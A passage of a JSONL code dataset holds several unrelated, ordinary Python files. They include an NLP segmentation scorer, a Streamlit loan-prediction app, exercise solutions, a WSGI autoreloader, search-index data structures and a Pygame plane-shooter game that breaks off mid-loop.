len(predicted_paragraphs) == len(input_paragraphs)\n\n preds = {}\n\n input_refs = {}\n unambigs = {}\n for pred in predicted_paragraphs:\n pred_offsets, text = get_predicted_offsets(pred)\n preds[text] = set(pred_offsets)\n\n for pred in input_paragraphs:\n unambig_offsets, text = get_input_unambig_offsets(pred)\n unambigs[text] = set(unambig_offsets)\n\n for pred in input_paragraphs:\n input_offsets, text = get_input_offsets(pred)\n input_refs[text] = set(input_offsets)\n\n print(\"\\n\".join(sorted(preds.keys() - refs.keys())))\n print('---')\n print(\"\\n\".join(sorted(refs.keys() - preds.keys())))\n\n assert not (preds.keys() - refs.keys())\n assert not (refs.keys() - preds.keys())\n assert not (refs.keys() - unambigs.keys())\n assert not (unambigs.keys() - refs.keys())\n\n return refs, preds, unambigs, input_refs\n\n\ndef calculate2(refs, preds, unambigs):\n tp = fp = fn = 0\n atp = afp = afn = 0\n a = 0\n for ref_text, ref_offsets in refs.items():\n pred_offsets = preds[ref_text]\n unambig_pred_offsets = unambigs[ref_text]\n \n tp += len(ref_offsets & pred_offsets)\n fn += len(ref_offsets - pred_offsets)\n fp += len(pred_offsets - ref_offsets)\n\n # print(unambig_pred_offsets)\n\n pred_offsets2 = pred_offsets - unambig_pred_offsets\n ambig_ref_offsets = ref_offsets - unambig_pred_offsets\n atp += len(ambig_ref_offsets & pred_offsets2)\n afn += len(ambig_ref_offsets - pred_offsets2)\n afp += len(pred_offsets2 - ambig_ref_offsets)\n\n a += len(ambig_ref_offsets)\n print(a)\n\n print('ALL')\n precision, recall, f1 = score(tp, fp, fn)\n\n print('Ambig')\n aprecision, arecall, af1 = score(atp, afp, afn)\n\n return tp, fp, fn,precision, recall, f1, atp, afp, afn, aprecision, arecall, af1\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description='Score segmentation (ignore spaces)')\n parser.add_argument('disamb_path', help='path to disamb JSONL or TSV (reference)')\n parser.add_argument('pred_path', help='path to predictions (Flair output)')\n parser.add_argument('tsv_path', help='path to TSV input data (with tokens marked as ambiguous)')\n\n args = parser.parse_args()\n \n refs, preds, unambigs, input_refs = calculate(args.disamb_path, args.pred_path, args.tsv_path)\n calculate2(refs, preds, unambigs)\n\n print('Against training')\n calculate2(input_refs, preds, unambigs)\n","repo_name":"kwrobel-nlp/kftt","sub_path":"score_segmentation.py","file_name":"score_segmentation.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15263937626","text":"import streamlit as st\r\nimport numpy as np\r\nimport pickle\r\n\r\nmodel = pickle.load(open('deployment.sav', 'rb'))\r\n\r\n\r\nst.title('Loan Prediction App')\r\n\r\ncredit_policy = st.slider(\"Credit Policy\",0,2,1)\r\nint_rate = st.slider(\"Interest Rate\",0.01,0.3,0.01)\r\ninstallment = st.slider(\"Installment\",10,1000,100)\r\nlog_annual_inc = st.slider(\"Log Annual Income\",0,6,0.8)\r\ndti = st.slider(\"Debt-to-Income Ratio\",0,30,10)\r\nfico = st.slider('FICO Credit Score',600,900,100)\r\ndays_with_cr_line = st.slider(\"Days with Credit Line\",0,30000,1000)\r\nrevol_bal = st.slider(\"Revolving Balance\",0,36000,1000)\r\nrevol_util = st.slider(\"Revolving Line Utilization Rate\",0,101,1)\r\ninq_last_6mths = st.slider(\"Inquiries in Last 6 Months\",0,7,1)\r\ndelinq_2yrs = st.slider(\"Delinquencies in Last 2 Years\",0,14,1)\r\npub_rec = st.slider(\"Public Records\",0,6,1)\r\npurpose_credit_card = st.slider('Purpose: Credit Card', 0,2,1)\r\npurpose_debt_consolidation = st.slider('Purpose: Debt Consolidation',0,2,1)\r\npurpose_educational = st.slider('Purpose: Educational',0,2,1)\r\npurpose_home_improvement = st.slider('Purpose: Home Improvement', 0,2,1)\r\npurpose_major_purchase = st.slider('Purpose: Major Purchase', 0,2,1)\r\npurpose_small_business = st.slider('Purpose: Small Business',0,2,1)\r\n\r\ndef predict():\r\n features =[int(x) for x in [credit_policy, int_rate, installment, log_annual_inc, dti, fico, days_with_cr_line, revol_bal, revol_util,inq_last_6mths, delinq_2yrs, pub_rec, purpose_credit_card, purpose_debt_consolidation, purpose_educational,purpose_home_improvement, purpose_major_purchase, purpose_small_business]]\r\n final_features = [np.array(features)]\r\n prediction = model.predict(final_features)\r\n \r\n if prediction == 1:\r\n st.success('The loan application is likely to be approved. :thumbsup:')\r\n else:\r\n st.warning('The loan application is likely to be rejected. :thumbsdown:')\r\ntrigger = st.button('Predict', on_click=predict)\r\n","repo_name":"ChetanSrikant/ML_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28993544378","text":"import itertools\npermutations = [list(i) for i in itertools.permutations([0,1,2,3,4,5,6,7,8,9])]\n\nprimes = [2,3,5,7,11,13,17]\ndef concat(digits, i):\n return int(str(digits[i+1])+str(digits[i+2])+str(digits[i+3]))\n\nsolutions = []\nfor n in permutations:\n digits = {}\n for digit in n:\n digits[digit+1] = n[digit]\n\n\n count = 0\n for i in range(1,8):\n #print(i+1, i+2, i+3)\n #print(primes[i-1])\n triplet = concat(digits,i)\n if triplet % primes[i-1] == 0:\n count += 1\n #if int(\"\".join(digits[i+1],digits[i+2],digits[i+3])) % primes[i-1] == 0:\n # count += 1\n #print(count)\n\n if count == 7:\n solution = int(''.join(str(i) for i in n))\n solutions.append(solution)\n\nanswer = sum(solutions)\nprint(answer)\n","repo_name":"harryboulton1/ProjectEuler-Solutions---Harry-Boulton","sub_path":"43.py","file_name":"43.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70410974821","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 19 08:57:16 2020\n\n@author: barbora\n\"\"\"\n\n# Using 7-8, make sure the sandwich 'pastrami' appears in the list at least\n# three times. Add code near the beginning of your program to print a \n# message saying the deli has run out of pastrami, and then use your while \n# loop to remove all occurrences of 'pastrami' from sandwich_orders. Make\n# sure no pastrami sandwiches end up in finished_sandwiches.\n\n# Create sandwich_orders list abd finished_sandwiches list\nsandwich_orders = ['tuna', 'pastrami', 'blt', 'ploughman\\'s', 'pastrami',\n 'smoked salmon', 'pastrami', 'ham & cheese', 'pastrami']\nfinished_sandwiches = []\n\n# Loop through the sandwiches and print messages\nprint(\"Bad news, we have run out of pastrami!\")\nwhile sandwich_orders:\n current_sandwich = sandwich_orders.pop(0)\n if (current_sandwich == 'pastrami'):\n continue\n print(f\"Your {current_sandwich} sandwich is being made.\")\n finished_sandwiches.append(current_sandwich)\n \n# Print all sandwiches\nfor sandwich in finished_sandwiches:\n print(f\"We have made your {sandwich} sandwich.\")\n \n# Alternatively\n#while 'pastrami' in sandwich_orders:\n# sandwich_orders.remove('pastrami')\n","repo_name":"barcern/python-crash-course","sub_path":"chapter7/7-9_no_pastrami.py","file_name":"7-9_no_pastrami.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74741362661","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Robust WSGI auto-reloading for development.\n#\n# Reload a WSGI application on source change. Keep the old code alive\n# when the change has syntax errors. Never close the socket, never refuse\n# a connection.\n#\n# Replacement for 'paster serve --reload config.ini'\n#\n# Daniel Holth \n\nimport os\nimport sys\nimport logging.config\nimport time\nimport threading\nimport ConfigParser\nfrom Queue import Empty\n\nfrom multiprocessing import Process, Queue, Event\nfrom multiprocessing import active_children\nfrom optparse import OptionParser\nfrom wsgiref.simple_server import make_server\n\nimport paste.deploy\nimport paste.reloader\n\nPOLL_INTERVAL = 1 # check for changes every n seconds.\nSPINUP_TIME = 10 # application must start within this time.\n\nclass Monitor(paste.reloader.Monitor):\n def __init__(self, tx=None, rx=None):\n paste.reloader.Monitor.__init__(self, POLL_INTERVAL)\n self.state = 'RUN'\n self.tx = tx\n self.rx = rx\n\n def periodic_reload(self):\n while not self.rx.is_set():\n if not self.check_reload():\n self.state = 'STANDBY'\n # inform code change\n self.tx.put({'pid':os.getpid(), 'status':'changed'})\n self.rx.wait(SPINUP_TIME)\n if self.rx.is_set():\n return\n self.state = 'RUN'\n self.module_mtimes = {}\n time.sleep(self.poll_interval)\n\ndef configure_logging(uri):\n \"\"\"Configure logging from the PasteDeploy .ini found at uri\"\"\"\n config_file = uri\n if config_file.startswith('config:'):\n config_file = config_file.split(':', 1)[1]\n parser = ConfigParser.ConfigParser()\n parser.read([config_file])\n if parser.has_section('loggers'):\n logging.config.fileConfig(config_file)\n\ndef serve(server, uri, tx, rx):\n try:\n configure_logging(uri)\n\n # load wsgi application\n app = paste.deploy.loadapp(uri)\n\n tx.put({'pid':os.getpid(), 'status':'loaded'})\n\n server.set_app(app)\n\n t = threading.Thread(target=server.serve_forever)\n t.setDaemon(True)\n t.start()\n\n monitor = Monitor(tx=tx, rx=rx)\n monitor.periodic_reload()\n\n except KeyboardInterrupt:\n pass\n\ndef serve_from_server(server_name, uri, tx, rx):\n \"\"\"Load named server from PasteDeploy .ini file and run.\n\n This will only work if multiple servers do not require access to\n an exclusive resource like a normal socket. In other words, this\n will not work with most WSGI servers.\n \n Intended for use with mongrel2_wsgi.\"\"\"\n\n try:\n configure_logging(uri)\n\n # load named server and default application:\n app = paste.deploy.loadapp(uri)\n server = paste.deploy.loadserver(uri, name=server_name)\n\n tx.put({'pid':os.getpid(), 'status':'loaded'})\n\n def go():\n server(app)\n\n t = threading.Thread(target=go)\n t.setDaemon(True)\n t.start()\n\n monitor = Monitor(tx=tx, rx=rx)\n monitor.periodic_reload()\n\n except KeyboardInterrupt:\n pass\n\ndef reloadwsgi(uri, host='localhost', port=8080, server_name=None):\n # tx, rx from the subprocess' perspective. \n tx = Queue()\n\n if not server_name:\n server = make_server(host, port, None)\n target = serve\n else:\n server = server_name\n target = serve_from_server\n\n def spinup():\n rx = Event()\n worker = Process(target=target, args=(server, uri, tx, rx))\n worker.rx = rx\n worker.start()\n return worker\n\n spinup()\n\n while True:\n try:\n msg = tx.get(True, 1)\n sys.stderr.write(\"%r\\n\" % msg)\n if msg['status'] == 'changed':\n spinup()\n elif msg['status'] == 'loaded':\n for worker in active_children():\n if worker.ident != msg['pid']:\n worker.rx.set()\n except Empty:\n if not active_children():\n return\n\ndef main():\n import optparse\n import os.path\n usage = \"\"\"Usage: %prog [options] config.ini\nRobust automatic reloading for WSGI development.\"\"\"\n parser = optparse.OptionParser(usage)\n parser.add_option(\"-s\", \"--s\", default=None, dest=\"server_name\",\n help=\"Load named server from [config.ini] instead of binding to a host and port.\")\n parser.add_option(\"-H\", \"--host\", dest=\"hostname\",\n default=\"localhost\", type=\"string\",\n help=\"Listen on hostname/address instead of localhost\")\n parser.add_option(\"-p\", \"--port\", dest=\"port\",\n default=8080, type=\"int\",\n help=\"Listen on port instead of 8080\")\n (options, args) = parser.parse_args()\n if len(args) != 1:\n parser.error(\"Must specify exactly one Paste Deploy .ini file.\")\n server_name = options.server_name\n host = options.hostname\n port = options.port\n config = os.path.abspath(args[0])\n reloadwsgi('config:%s' % config, host=host, port=port,\n server_name=server_name)\n\ndef app_factory(global_config, **local_conf):\n \"\"\"For testing.\"\"\"\n import wsgiref.simple_server\n return wsgiref.simple_server.demo_app\n\nif __name__ == \"__main__\":\n import reloadwsgi\n import pkg_resources\n import os.path\n resource = pkg_resources.resource_filename(__name__, 'test_reloadwsgi.ini')\n resource = os.path.abspath(resource)\n reloadwsgi.reloadwsgi('config:%s' % resource)\n","repo_name":"dholth/reloadwsgi","sub_path":"reloadwsgi.py","file_name":"reloadwsgi.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31167849861","text":"from collections import OrderedDict\n\n\n# each user has a own history\n# each History stores up to 20 popular keywords\n# key: user_email or \"anonymous\"\n# value: History\nclass UserHistoryIndex(dict): \n def __init__(self):\n dict.__init__(self)\n\n # get user's history, if user history does not exist, create a new user history\n def get_history(self, _email):\n if _email in self.keys():\n return self[_email]\n # if user history does not exist, create a new user history\n self[_email] = History()\n return self[_email]\n\nclass History(OrderedDict): \n def __init__(self):\n OrderedDict.__init__(self) \n \n # the format of each entry is \n # keyword : (number of times searched, how recent the keyword is searched)\n # \"how recent the keyword is searched\" is recorded in an integer, 1 means most recent, larger number means the keyword is older\n def add_new_keywords(self, words_list): \n # make exsiting keywords old before adding new keyword\n self.make_keywords_old() \n \n for keyword in words_list:\n # the keyword has been searched before\n if keyword in self:\n self[keyword] = (self[keyword][0]+1,1)\n # the keyword has not been searched before \n else:\n self[keyword] = (1,1) \n \n # sort the history after adding new keyword\n self.sort() \n \n def sort(self):\n # sort key word by \"number of times searched\" first\n # if \"number of times searched\" is the same, rank depends on \"how recent the keyword is searched\"\n temp = OrderedDict(sorted(self.items(), key = lambda entry: (-entry[1][0], entry[1][1])))\n \n # assignment to self is not allowed, so we need to clear and add entries one by one \n self.clear() \n for entry in temp:\n self[entry] = temp[entry]\n\n # add 1 to \"how recent the keyword is searched\" for every existing \n def make_keywords_old(self): \n for keyword in self:\n self[keyword] = (self[keyword][0],self[keyword][1]+1)\n \n # get up to 20 popular keywords in history\n def get_popular(self): \n popular = OrderedDict()\n counter = 0\n for entry in self:\n popular[entry] = self[entry]\n counter += 1\n if counter >= 20:\n break\n return popular.items()\n\n# each user has a own RecentWords\n# each RecentWords stores up to 10 recent keywords\n# key: user_email\n# value: RecentWords\nclass UserRecentWordsIndex(dict): \n def __init__(self):\n dict.__init__(self)\n\n # get user's recent words list, if recent words list does not exist, create a new recent words list\n def get_recent_words(self, _email):\n if _email in self.keys():\n return self[_email]\n # if user does not exist, create a new recent words list\n self[_email] = RecentWords()\n return self[_email]\n\nclass RecentWords(list): \n def __init__(self):\n list.__init__(self) \n \n def add_new_keywords(self, words_list):\n for keyword in words_list:\n # if the recent words list reached max size\n if len(self) == 10:\n self.pop()\n # insert at the head of the list\n self.insert(0, keyword)\n\n\n# key is document id\n# value is document\nclass DocumentIndex(OrderedDict): \n def __init__(self):\n OrderedDict.__init__(self)\n\n def __setitem__(self, key, val):\n if not isinstance(key, int):\n raise ValueError(\"document_index key must be an int\")\n if not isinstance(val, Document):\n raise ValueError(\"document_index value must be a document\")\n return OrderedDict.__setitem__(self, key, val)\n\n# a data structure for each entry in the document index\nclass Document(): \n def __init__(self, url=\"\", depth=0, title=\"\", short_description=\"\", words=None):\n if not isinstance(url, basestring):\n raise ValueError(\"document url must be a basestring\")\n if not isinstance(depth, int):\n raise ValueError(\"document depth must be an int\")\n if not isinstance(title, basestring):\n raise ValueError(\"document title must be a basestring\")\n if not isinstance(short_description, basestring):\n raise ValueError(\"document short_description must be a basestring\")\n self.url = url\n self.depth = depth\n self.title = title\n self.short_description = short_description \n self.words = words \n\n def __repr__(self):\n if self.words:\n return \", \".join([self.url, str(self.depth), self.title, self.short_description, str(len(self.words))])\n else:\n return \", \".join([self.url, str(self.depth), self.title, self.short_description, \"\", \"\"])\n\n# key is word id\n# value is as set of document ids\nclass InvertedIndex(dict): \n def __init__(self):\n dict.__init__(self)\n\n def __setitem__(self, key, val):\n if not isinstance(key, int):\n raise ValueError(\"inverted_index key must be an int\")\n #if not isinstance(val, dict):\n # raise ValueError(\"inverted_index value must be a dict\")\n return dict.__setitem__(self, key, val)\n\n def add(self, word_id, document_id, font_size):\n if not isinstance(word_id, int):\n raise ValueError(\"word_id must be an int\")\n if not isinstance(document_id, int):\n raise ValueError(\"document_id must be an int\")\n\n if word_id in self:\n if document_id in self[word_id]:\n self[word_id][document_id] += font_size\n else:\n self[word_id][document_id] = font_size\n else:\n self[word_id] = { }\n self[word_id][document_id] = font_size\n\n# key is word string\n# value is as set of document urls\nclass ResolvedInvertedIndex(dict): \n def __init__(self):\n dict.__init__(self)\n\n def __setitem__(self, key, val):\n if not isinstance(key, basestring):\n raise ValueError(\"resolved_inverted_index key must be a basestring\")\n if not isinstance(val, set):\n raise ValueError(\"resolved_inverted_index value must be a set\")\n return dict.__setitem__(self, key, val)\n\n def add(self, word_str, document_url):\n if not isinstance(word_str, basestring):\n raise ValueError(\"word_str must be a basestring\")\n if not isinstance(document_url, basestring):\n raise ValueError(\"document_url must be a basestring\")\n\n if word_str in self:\n self[word_str].add(document_url)\n else:\n self[word_str] = set([document_url])","repo_name":"ganyangut/csc326","sub_path":"instance_deployment/copy_to_aws/lab4_code/backend/data_structures.py","file_name":"data_structures.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"40531384773","text":"def erange(*args):\n if len(args) > 3 or len(args) == 0:\n raise TypeError(\n f\"erange expected {3 if len(args) > 3 else 1} arguments, got {len(args)}\")\n if any([type(i) != int for i in args]):\n raise TypeError(\"all arguments must be of type 'int'\")\n\n start = args[0] if len(args) >= 2 else 0\n stop = args[0] if len(args) == 1 else args[1]\n step = args[2] if len(args) == 3 else 1\n\n if step == 0:\n raise ValueError(\"step arg must not be 0\")\n\n i = start\n while (i < stop) if step > 0 else (i > stop):\n yield i\n i += step\n\n\ndef numerate(elements, start=0):\n i = 0\n for v in elements[start:]:\n yield (i, v)\n i += 1","repo_name":"banana-galaxy/challenges","sub_path":"challenge5(ranges)/Takos.py","file_name":"Takos.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"31608832227","text":"import pygame\nimport pygame.image\nimport pygame.time\nimport pygame.mixer\nimport pygame.event\nimport pygame.display\nimport pygame.key\n# 导入pygame的全部常量模块\nfrom pygame.locals import *\nimport pygame.sprite\nimport pygame.mask\nimport pygame.draw\nimport pygame.font\n\nimport sys\nimport traceback # 异常捕捉模块\nimport myplane\nimport enemy\nimport bullet\nimport supply\nimport random\n\n# 游戏模块初始化\npygame.init()\n# 混音器初始化\npygame.mixer.init()\n\n# 定义游戏画面大小\nbg_size = width, height = 480, 700\n# 设置游戏屏幕大小\nscreen = pygame.display.set_mode(bg_size)\n# 设置游戏标题\npygame.display.set_caption('飞机大战 -- Demo')\n\nbackground = pygame.image.load('images/background.png').convert_alpha()\n\n# 音乐和音效\npygame.mixer.music.load(\"sound/game_music.ogg\")\npygame.mixer.music.set_volume(0.1)\nbullet_sound = pygame.mixer.Sound(\"sound/bullet.wav\")\nbullet_sound.set_volume(0.2)\nbomb_sound = pygame.mixer.Sound(\"sound/use_bomb.wav\")\nbomb_sound.set_volume(0.2)\nsupply_sound = pygame.mixer.Sound(\"sound/supply.wav\")\nsupply_sound.set_volume(0.2)\nget_bomb_sound = pygame.mixer.Sound(\"sound/get_bomb.wav\")\nget_bomb_sound.set_volume(0.2)\nget_bullet_sound = pygame.mixer.Sound(\"sound/get_bullet.wav\")\nget_bullet_sound.set_volume(0.2)\nupgrade_sound = pygame.mixer.Sound(\"sound/upgrade.wav\")\nupgrade_sound.set_volume(0.2)\nenemy3_fly_sound = pygame.mixer.Sound(\"sound/enemy3_flying.wav\")\nenemy3_fly_sound.set_volume(0.2)\nenemy1_down_sound = pygame.mixer.Sound(\"sound/enemy1_down.wav\")\nenemy1_down_sound.set_volume(0.2)\nenemy2_down_sound = pygame.mixer.Sound(\"sound/enemy2_down.wav\")\nenemy2_down_sound.set_volume(0.3)\nenemy3_down_sound = pygame.mixer.Sound(\"sound/enemy3_down.wav\")\nenemy3_down_sound.set_volume(0.5)\nme_down_sound = pygame.mixer.Sound(\"sound/me_down.wav\")\nme_down_sound.set_volume(0.2)\n\n# 用于下面增加游戏难度的方法 和实例化飞机\ndef add_small_enemies(group1, group2, num):\n for i in range(num):\n e1 = enemy.SmallEnemy(bg_size)\n # group() 用add 列表用append\n group1.add(e1)\n group2.add(e1)\n\n# 用于下面增加游戏难度的方法 和实例化飞机\ndef add_mid_enemies(group1, group2, num):\n for i in range(num):\n e2 = enemy.MidEnemy(bg_size)\n group1.add(e2)\n group2.add(e2)\n\n# 用于下面增加游戏难度的方法 和实例化飞机\ndef add_big_enemies(group1, group2, num):\n for i in range(num):\n e3 = enemy.BigEnemy(bg_size)\n group1.add(e3)\n group2.add(e3)\n# 增加目标机型的速度\ndef inc_speed(target, inc):\n for i in target:\n i.speed += inc\n\n# 主函数\ndef main():\n # 无限循环播放音乐\n pygame.mixer.music.play(-1)\n # 设置游戏帧率参数\n clock = pygame.time.Clock()\n # 用于切换飞机图片 达到动态在突突突的飞行效果\n switch_image = True\n # 因为图片切换看不出效果 所以加一个延迟 毫秒\n delay = 100\n\n # 生成我方飞机对象\n me = myplane.MyPlane(bg_size)\n # 生成一个敌方飞机的Group,用于之后的碰撞检测\n enemies = pygame.sprite.Group()\n\n # 生成小飞机对象 一枪一个\n small_enemies = pygame.sprite.Group()\n # 用于后面增加游戏难度和初始化飞机个数\n add_small_enemies(small_enemies, enemies, 15)\n\n # 生成中飞机对象 多枪一个\n mid_enemies = pygame.sprite.Group()\n # 用于后面增加游戏难度和初始化飞机个数\n add_mid_enemies(mid_enemies, enemies, 20)\n\n # 生成大飞机对象 超多枪一个\n big_enemies = pygame.sprite.Group()\n # 用于后面增加游戏难度和初始化飞机个数\n add_big_enemies(big_enemies, enemies, 10)\n\n # 敌机中弹/摧毁 时图片索引\n e1_destroy_index = 0\n e2_destroy_index = 0\n e3_destroy_index = 0\n me_destroy_index = 0\n\n # 实例化子弹\n # 子弹数\n bullet1 = []\n BULLET1_NUM = 4\n bullet1_index = 0\n for i in range(BULLET1_NUM):\n bullet1.append(bullet.Bullet1(me.rect.midtop))\n\n # 定义几个颜色,用于后面绘制飞机血量\n black = (0, 0, 0)\n green = (0, 255, 0)\n red = (255, 0, 0)\n white = (255, 255, 255) # 分数的颜色(score)\n\n # 统计得分\n score = 0\n # 分数用的字体样式 和 字体大小\n score_font = pygame.font.Font('font/font.ttf', 36)\n\n # 实现一个暂停和继续游戏的功能\n # 设置一个参数用来标志是否暂停游戏\n paused = False\n\n pause_nor_image = pygame.image.load('images/pause_nor.png').convert_alpha() # 图一\n pause_pressed_image = pygame.image.load('images/pause_pressed.png').convert_alpha()# 鼠标放置在图一上时,显示这个动效图片,增加互动性\n resume_nor_image = pygame.image.load('images/resume_nor.png').convert_alpha() # 图二\n resume_pressed_image = pygame.image.load('images/resume_pressed.png').convert_alpha()# 鼠标放置在图二上时,显示这个动效图片,增加互动性\n # 获取一个图片的限定矩形(四个大小都一样)\n paused_rect = pause_nor_image.get_rect()\n # 暂停继续放在右上角( 减10 是为了美观)\n paused_rect.left, paused_rect.top = width - paused_rect.width - 10, 10\n # 设置默认显示 (默认右上角显示没有把鼠标放在暂停图片上的图片)\n paused_image = pause_nor_image\n\n # 增加调整游戏难度的参数\n level = 1\n # 增加全屏炸弹左下角字样\n bomb_image = pygame.image.load('images/bomb.png').convert_alpha()\n bomb_rect = bomb_image.get_rect()\n bomb_rect.left, bomb_rect.top = 10, height - 10 - bomb_rect.height\n bomd_font = pygame.font.Font('font/font.ttf', 36)\n bomb_num = 3\n\n # 增加炸弹和双枪支援\n # 实例化双枪补给\n double_supply = supply.Bullet_Supply(bg_size)\n # 实例化炸弹补给\n bomb_supply = supply.Bomb_Supply(bg_size)\n # 添加自定义事件 用来控制每30 秒提供一次支援\n Supply_EVENT = pygame.USEREVENT\n pygame.time.set_timer(Supply_EVENT, 10 * 1000)\n\n # 增加一个自定义时间事件用来记录双枪的持续时间\n Double_Bullet_Event = pygame.USEREVENT + 1\n # 增加一个变量用来记录是否使用超级子弹 默认为没有使用\n is_double_bullet = False\n # 实例化双枪子弹\n bullet2 = []\n bullet2_index = 0\n BULLET2_NUM = 8\n # 因为我们遍历一次添加两个子弹对象 所以BULLET2_NUM // 2\n for each in range(BULLET2_NUM // 2):\n bullet2.append(bullet.Bullet2((me.rect.centerx - 33, me.rect.centery - 50)))\n bullet2.append(bullet.Bullet2((me.rect.centerx + 30, me.rect.centery - 50)))\n\n # 设置一个参数,记录是否暂停过游戏\n # 用于后面支援事件继续从上次暂停的事件继续,而不是从头再计时\n # 没有实现,遗留BUG\n\n # 我方飞机生命的小图片\n life_image = pygame.image.load('images/life.png').convert_alpha()\n life_image_rect = life_image.get_rect()\n\n # 我方飞机生命数\n life_num = 3\n\n # 定义一个自定义事件,用于我方飞机重生后无敌三秒\n Invincible_Event = pygame.USEREVENT + 2\n\n # 定义一个参数,用来阻止结束时重复打开和关闭文件\n recorded = False\n\n # 游戏结束时的按钮图片\n gameover_font = pygame.font.Font('font/font.ttf', 48) # 重写一次是因为与上次的大小不一样\n again_image = pygame.image.load('images/again.png').convert_alpha()\n again_rect = again_image.get_rect()\n gameover_image = pygame.image.load('images/gameover.png').convert_alpha()\n gameover_rect = gameover_image.get_rect()\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n # 用更好的退出方式\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n # 检测鼠标 当前的点是否放置在图片限定矩形上 并且是否按下了左键\n if event.button == 1 and paused_rect.collidepoint(event.pos):\n paused = not paused\n # 这儿添加的代码用来暂停游戏时停止背景音乐和音效\n if paused:\n # 停背景音乐\n pygame.mixer.music.pause()\n # 停音效(大飞机出生音效)\n pygame.mixer.pause()\n else:\n pygame.mixer.music.unpause()\n pygame.mixer.unpause()\n\n\n if event.type == pygame.MOUSEMOTION:\n # 检测鼠标当前的点是否放置在图片限定矩形上\n if paused_rect.collidepoint(event.pos):\n if paused:\n paused_image = resume_pressed_image\n else:\n pygame.mixer.music.unpause()\n paused_image = pause_pressed_image\n else:\n if paused:\n paused_image = resume_nor_image\n else:\n paused_image = pause_nor_image\n if event.type == pygame.KEYDOWN:\n # 检测是否是激活状态 且 是否按下了空格键\n if event.key == pygame.K_SPACE and not paused:\n # 有炸弹才能执行\n if bomb_num:\n bomb_num -= 1\n # 按下暂停键时遍历飞机 设置为摧毁状态\n for i in enemies:\n if i.rect.bottom > 0:\n i.active = False\n # 检测到补给时间到时,随机投放\n if event.type == Supply_EVENT and not paused:\n supply_sound.play()\n # 随机选一个\n if random.choice([False, True]):\n # True时,投放全屏炸弹\n bomb_supply.reset()\n else:\n # False 是,投放双枪子弹\n double_supply.reset()\n # 检测是否产生了双枪事件\n if event.type == Double_Bullet_Event:\n # 拾取到双枪之后,计时器开始工作,工作五秒后再产生一个Double_Bullet_Event自定义事件,标志着持续时间结束\n is_double_bullet = False\n # 取消关注定时器\n pygame.time.set_timer(Double_Bullet_Event, 0)\n # 检测到我方飞机无敌时间结束 解除无敌\n if event.type == Invincible_Event:\n # 检测到结束时停止该事件 并解除无敌\n pygame.time.set_timer(Invincible_Event, 0)\n me.invincible = False\n\n # 绘制背景图至窗口 (0,0) 相对窗口的位置\n # 绘制在 if not paused: 前是因为在点击暂停之后需要将战局用background覆盖,防止用户通过频繁的暂停和开始来躲避敌机\n screen.blit(background, (0, 0))\n\n # 根据分数调整当前游戏难度\n if level == 1 and score > 50000:\n level = 2\n # 难度增加的提示音效\n upgrade_sound.play()\n add_small_enemies(small_enemies, enemies, 3)\n add_mid_enemies(mid_enemies, enemies, 2)\n add_big_enemies(big_enemies, enemies, 1)\n # 增加小型机速度\n inc_speed(small_enemies, 1)\n elif level == 2 and score > 300000:\n level = 3\n upgrade_sound.play()\n add_small_enemies(small_enemies, enemies, 5)\n add_mid_enemies(mid_enemies, enemies, 3)\n add_big_enemies(big_enemies, enemies, 2)\n # 增加小、中型机速度\n inc_speed(small_enemies, 1)\n inc_speed(mid_enemies, 1)\n elif level == 3 and score > 600000:\n level = 4\n upgrade_sound.play()\n add_small_enemies(small_enemies, enemies, 5)\n add_mid_enemies(mid_enemies, enemies, 3)\n add_big_enemies(big_enemies, enemies, 2)\n # 增加小、中型机速度\n inc_speed(small_enemies, 1)\n inc_speed(mid_enemies, 1)\n\n # 只有为True 才能运行\n if not paused and life_num:\n # 检测用户的键盘操作 (序列) # 获取到的是键盘所有键的状态序列,存储每个键是否按下(True,False)\n # 频繁键盘事件用此方法\n key_pressed = pygame.key.get_pressed()\n\n # W 按键和上方向键都可以控制\n if key_pressed[K_w] or key_pressed[K_UP]:\n me.moveUp()\n if key_pressed[K_s] or key_pressed[K_DOWN]:\n me.moveDown()\n if key_pressed[K_a] or key_pressed[K_LEFT]:\n me.moveLeft()\n if key_pressed[K_d] or key_pressed[K_RIGHT]:\n me.moveRight()\n\n # 如果随机到炸弹补给\n # 用一个对象前,先检测是否是我们想要的状态,是才执行\n if bomb_supply.active:\n screen.blit(bomb_supply.image, bomb_supply.rect)\n bomb_supply.move()\n # 检测两个精灵是否碰撞 pygame.sprite.collide_mask(精灵1, 精灵2)\n if pygame.sprite.collide_mask(bomb_supply, me):\n bomb_supply.active = False\n # 拾取到全屏炸弹\n get_bomb_sound.play()\n # 检测炸弹数是否小于3,小于3个才增加\n if bomb_num < 3:\n bomb_num += 1\n # 如果随加到双枪补给\n if double_supply.active:\n screen.blit(double_supply.image, double_supply.rect)\n double_supply.move()\n if pygame.sprite.collide_mask(double_supply, me):\n get_bullet_sound.play()\n # 检测到拾取到补给后,设置记录双枪的变量为True,用来后面发射双枪\n is_double_bullet = True\n # 检测到拾取到双枪补给后,开始产生一个双枪自定义事件,五秒后再次产生一个此事件\n pygame.time.set_timer(Double_Bullet_Event, 5 * 1000)\n # 拾取到之后应设置属性为False\n double_supply.active = False\n\n # 检测到双枪变量为True后\n if is_double_bullet:\n if not(delay % 10):\n # 